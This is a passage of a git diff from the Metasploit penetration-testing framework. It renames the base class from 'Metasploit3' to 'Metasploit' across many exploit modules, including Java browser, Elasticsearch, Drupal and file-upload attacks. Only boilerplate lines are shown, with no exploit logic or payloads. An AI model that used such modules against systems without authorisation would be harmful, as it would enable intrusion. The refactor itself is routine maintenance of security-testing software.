Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb index 9fe7bb5ea4..373a5ed7e2 100644 --- a/modules/exploits/multi/browser/itms_overflow.rb +++ b/modules/exploits/multi/browser/itms_overflow.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb index aedfed2fd1..3df40d65d8 100644 --- a/modules/exploits/multi/browser/java_atomicreferencearray.rb +++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_calendar_deserialize.rb b/modules/exploits/multi/browser/java_calendar_deserialize.rb index 3942291ee4..0440132273 100644 --- a/modules/exploits/multi/browser/java_calendar_deserialize.rb +++ b/modules/exploits/multi/browser/java_calendar_deserialize.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_getsoundbank_bof.rb b/modules/exploits/multi/browser/java_getsoundbank_bof.rb index 3a123768f2..85880c89be 100644 --- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb +++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/multi/browser/java_jre17_driver_manager.rb b/modules/exploits/multi/browser/java_jre17_driver_manager.rb index b832f9ea9b..bd65c4a36f 100644 --- a/modules/exploits/multi/browser/java_jre17_driver_manager.rb +++ b/modules/exploits/multi/browser/java_jre17_driver_manager.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_exec.rb b/modules/exploits/multi/browser/java_jre17_exec.rb index 9280d870ad..66caacbec5 100644 --- a/modules/exploits/multi/browser/java_jre17_exec.rb +++ b/modules/exploits/multi/browser/java_jre17_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb index 7c37c553a2..03e0c61574 100644 --- a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb +++ b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jaxws.rb b/modules/exploits/multi/browser/java_jre17_jaxws.rb index 4dfad212b6..2774e68283 100644 --- a/modules/exploits/multi/browser/java_jre17_jaxws.rb +++ b/modules/exploits/multi/browser/java_jre17_jaxws.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean.rb b/modules/exploits/multi/browser/java_jre17_jmxbean.rb index 597c3fdf2f..10aafbfa00 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb index 906d07867f..4419e9abf7 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb index 32f55c5613..ece18ab03c 100644 --- a/modules/exploits/multi/browser/java_jre17_method_handle.rb +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb index 9e4931f342..43115bd988 100644 --- a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb +++ b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_reflection_types.rb b/modules/exploits/multi/browser/java_jre17_reflection_types.rb index 9fa97d5e57..e752834c6a 100644 --- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb +++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_rhino.rb b/modules/exploits/multi/browser/java_rhino.rb index c752549994..28f6f2285d 100644 --- a/modules/exploits/multi/browser/java_rhino.rb +++ b/modules/exploits/multi/browser/java_rhino.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_rmi_connection_impl.rb b/modules/exploits/multi/browser/java_rmi_connection_impl.rb index 41a3705785..355a1be3f5 100644 --- a/modules/exploits/multi/browser/java_rmi_connection_impl.rb +++ b/modules/exploits/multi/browser/java_rmi_connection_impl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_setdifficm_bof.rb b/modules/exploits/multi/browser/java_setdifficm_bof.rb index 46be8c7c58..e395294533 100644 --- a/modules/exploits/multi/browser/java_setdifficm_bof.rb +++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 82bc228e50..1c238af16a 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_storeimagearray.rb b/modules/exploits/multi/browser/java_storeimagearray.rb index cab28b512a..417f3c0f14 100644 --- a/modules/exploits/multi/browser/java_storeimagearray.rb +++ b/modules/exploits/multi/browser/java_storeimagearray.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_trusted_chain.rb b/modules/exploits/multi/browser/java_trusted_chain.rb index e2f4651f3e..a988946d6c 100644 --- a/modules/exploits/multi/browser/java_trusted_chain.rb +++ b/modules/exploits/multi/browser/java_trusted_chain.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_verifier_field_access.rb b/modules/exploits/multi/browser/java_verifier_field_access.rb index dbe08a3035..a0ce1ce051 100644 --- a/modules/exploits/multi/browser/java_verifier_field_access.rb +++ b/modules/exploits/multi/browser/java_verifier_field_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index b01bba4436..6d775b69c4 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/multi/browser/mozilla_navigatorjava.rb b/modules/exploits/multi/browser/mozilla_navigatorjava.rb index bf763ea14d..0b3627ac4c 100644 --- a/modules/exploits/multi/browser/mozilla_navigatorjava.rb +++ b/modules/exploits/multi/browser/mozilla_navigatorjava.rb @@ -6,7 +6,7 @@ require 'msf/core/constants' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/opera_configoverwrite.rb b/modules/exploits/multi/browser/opera_configoverwrite.rb index 0e426d005b..193c0e7cc8 100644 --- a/modules/exploits/multi/browser/opera_configoverwrite.rb +++ b/modules/exploits/multi/browser/opera_configoverwrite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb index 470e2f1eb5..571893076f 100644 --- a/modules/exploits/multi/browser/opera_historysearch.rb +++ b/modules/exploits/multi/browser/opera_historysearch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/qtjava_pointer.rb b/modules/exploits/multi/browser/qtjava_pointer.rb index 5a1e3c5e1b..8874bb7456 100644 --- a/modules/exploits/multi/browser/qtjava_pointer.rb +++ b/modules/exploits/multi/browser/qtjava_pointer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index 685a0ae6d7..d166e13df1 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/elasticsearch/search_groovy_script.rb b/modules/exploits/multi/elasticsearch/search_groovy_script.rb index ee65df2cc2..31238bb8b4 100644 --- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb +++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb index fc668215fb..700acb3cd7 100644 --- a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb +++ b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb index 1e15976eb4..100d886f12 100644 --- a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb +++ b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/maple_maplet.rb b/modules/exploits/multi/fileformat/maple_maplet.rb index 96e8152bf5..d997509bbb 100644 --- a/modules/exploits/multi/fileformat/maple_maplet.rb +++ b/modules/exploits/multi/fileformat/maple_maplet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb b/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb index 3b72a6101e..17bca08a2b 100644 --- a/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb +++ b/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/peazip_command_injection.rb b/modules/exploits/multi/fileformat/peazip_command_injection.rb index 8fe12bb9d3..3c221cf89d 100644 --- a/modules/exploits/multi/fileformat/peazip_command_injection.rb +++ b/modules/exploits/multi/fileformat/peazip_command_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb index 3a910ece59..0ae9df8508 100644 --- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb +++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/multi/gdb/gdb_server_exec.rb b/modules/exploits/multi/gdb/gdb_server_exec.rb index 9d501c7793..ca60cf0926 100644 --- a/modules/exploits/multi/gdb/gdb_server_exec.rb +++ b/modules/exploits/multi/gdb/gdb_server_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Gdb diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index 47840b548e..141aa03242 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/multi/http/activecollab_chat.rb b/modules/exploits/multi/http/activecollab_chat.rb index d8f6182078..fdeedab472 100644 --- a/modules/exploits/multi/http/activecollab_chat.rb +++ b/modules/exploits/multi/http/activecollab_chat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index 5899e09be6..82d4741b63 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/apache_roller_ognl_injection.rb b/modules/exploits/multi/http/apache_roller_ognl_injection.rb index 7c34f04663..2fe7ddef30 100644 --- a/modules/exploits/multi/http/apache_roller_ognl_injection.rb +++ b/modules/exploits/multi/http/apache_roller_ognl_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/apprain_upload_exec.rb b/modules/exploits/multi/http/apprain_upload_exec.rb index a7a8dbd4f9..3c3c9361d9 100644 --- a/modules/exploits/multi/http/apprain_upload_exec.rb +++ b/modules/exploits/multi/http/apprain_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index fb6be15379..88cc3f06d1 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index 645a337f93..00c386f116 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index ca192f495c..1b3b7f08e7 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] } diff --git a/modules/exploits/multi/http/bolt_file_upload.rb b/modules/exploits/multi/http/bolt_file_upload.rb index 30b5987cb4..24684cb998 100644 --- a/modules/exploits/multi/http/bolt_file_upload.rb +++ b/modules/exploits/multi/http/bolt_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb index 348dea375a..af6d21ba0a 100644 --- a/modules/exploits/multi/http/cisco_dcnm_upload.rb +++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/coldfusion_rds.rb b/modules/exploits/multi/http/coldfusion_rds.rb index 758cbcf46e..bb15b79b7f 100644 --- a/modules/exploits/multi/http/coldfusion_rds.rb +++ b/modules/exploits/multi/http/coldfusion_rds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/http/cuteflow_upload_exec.rb b/modules/exploits/multi/http/cuteflow_upload_exec.rb index 865ca0fbd2..2399821e7d 100644 --- a/modules/exploits/multi/http/cuteflow_upload_exec.rb +++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/dexter_casinoloader_exec.rb b/modules/exploits/multi/http/dexter_casinoloader_exec.rb index f999bafa7c..577ff06969 100644 --- a/modules/exploits/multi/http/dexter_casinoloader_exec.rb +++ b/modules/exploits/multi/http/dexter_casinoloader_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/drupal_drupageddon.rb b/modules/exploits/multi/http/drupal_drupageddon.rb index ac0adec7c5..673446bdb7 100644 --- a/modules/exploits/multi/http/drupal_drupageddon.rb +++ b/modules/exploits/multi/http/drupal_drupageddon.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/eaton_nsm_code_exec.rb b/modules/exploits/multi/http/eaton_nsm_code_exec.rb index b25107fc24..a7f9b6287c 100644 --- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb +++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/eventlog_file_upload.rb b/modules/exploits/multi/http/eventlog_file_upload.rb index eda04d55c3..9075976e00 100644 --- a/modules/exploits/multi/http/eventlog_file_upload.rb +++ b/modules/exploits/multi/http/eventlog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/extplorer_upload_exec.rb b/modules/exploits/multi/http/extplorer_upload_exec.rb index 542509bd28..3f0096758b 100644 --- a/modules/exploits/multi/http/extplorer_upload_exec.rb +++ b/modules/exploits/multi/http/extplorer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/familycms_less_exec.rb b/modules/exploits/multi/http/familycms_less_exec.rb index 07e3741261..e5984efe03 100644 --- a/modules/exploits/multi/http/familycms_less_exec.rb +++ b/modules/exploits/multi/http/familycms_less_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/freenas_exec_raw.rb b/modules/exploits/multi/http/freenas_exec_raw.rb index da1dbb571e..d63d663e65 100644 --- a/modules/exploits/multi/http/freenas_exec_raw.rb +++ b/modules/exploits/multi/http/freenas_exec_raw.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb index 5f1b1054dc..739b9f3277 100644 --- a/modules/exploits/multi/http/gitlab_shell_exec.rb +++ b/modules/exploits/multi/http/gitlab_shell_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/gitorious_graph.rb b/modules/exploits/multi/http/gitorious_graph.rb index 8258c0e9f1..1361bf502e 100644 --- a/modules/exploits/multi/http/gitorious_graph.rb +++ b/modules/exploits/multi/http/gitorious_graph.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index 43782be301..1d35508be0 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -8,7 +8,7 @@ require 'nokogiri' require 'metasploit/framework/login_scanner/glassfish' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index a829e464cc..d5062fb8fa 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/glpi_install_rce.rb b/modules/exploits/multi/http/glpi_install_rce.rb index 19cdc98388..4c5786cf0d 100644 --- a/modules/exploits/multi/http/glpi_install_rce.rb +++ b/modules/exploits/multi/http/glpi_install_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking # Application database configuration is overwritten include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/horde_href_backdoor.rb b/modules/exploits/multi/http/horde_href_backdoor.rb index 2490945fbb..b8a835004e 100644 --- a/modules/exploits/multi/http/horde_href_backdoor.rb +++ b/modules/exploits/multi/http/horde_href_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb index e27433b5a2..d88f1256a6 100644 --- a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb +++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index aa418720b9..aabcf6c2ee 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb index 25f76c5668..c0255cfbef 100644 --- a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git 